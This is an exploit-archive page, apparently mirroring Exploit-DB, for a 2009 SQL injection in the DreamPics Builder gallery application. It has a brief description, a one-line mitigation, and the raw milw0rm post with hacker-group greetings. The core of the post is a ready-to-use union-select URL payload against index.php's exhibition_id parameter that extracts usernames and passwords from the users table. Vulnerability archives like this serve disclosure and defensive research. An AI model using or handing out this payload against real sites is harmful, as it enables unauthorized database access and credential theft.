header-logo
Suggest Exploit
vendor:
DreamPics Builder
by:
Mr.SQL
9,3
CVSS
HIGH
SQL Injection
89
CWE
Product Name: DreamPics Builder
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Remote SQL Injection Vulnerability ( index.php fuseaction )

A vulnerability in the DreamPics Builder application allows an attacker to inject arbitrary SQL commands via the 'fuseaction' parameter in the 'index.php' script. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. Successful exploitation may allow an attacker to gain access to the application with administrative privileges.

Mitigation:

Input validation should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

###############################################################
#################### Viva IslaM Viva IslaM ####################
##
## Remote SQL Injection Vulnerability ( index.php fuseaction )
##
## DREAMPICS BUILDER
##
## http://www.dreamlevels.com/dreampics.php
##
###############################################################
###############################################################
##
## AuTh0r : Mr.SQL
##
## H0ME   : WwW.55a.NeT
##
## Email  : SQL@Hotmail.iT
##
########################
########################
##
## -[[: ExploiteS :]]-
##
## www.TraGeT.CoM/index.php?fuseaction=gallery.viewPhotos&exhibition_id=-0+union+select+0,0,CONCAT_WS(0x3a,user_name,user_password),0,0,+from+users--
##
########################
########################

#########################################################################################################
#########################################################################################################
                                  -(:: !Gr3E3E3E3E3E3E3TzZ! ::)-
                                        
:: HaCkEr_EGy :: Dark MaSTer  :: His0k4 :: MoHaMeD el 3rab :: ALwHeD :: Ghost Hacker :: MuslimS HaCkErS ::
#########################################################################################################
#########################################################################################################

# milw0rm.com [2009-08-18]

Navigation

Suggest Exploit

Services By CQR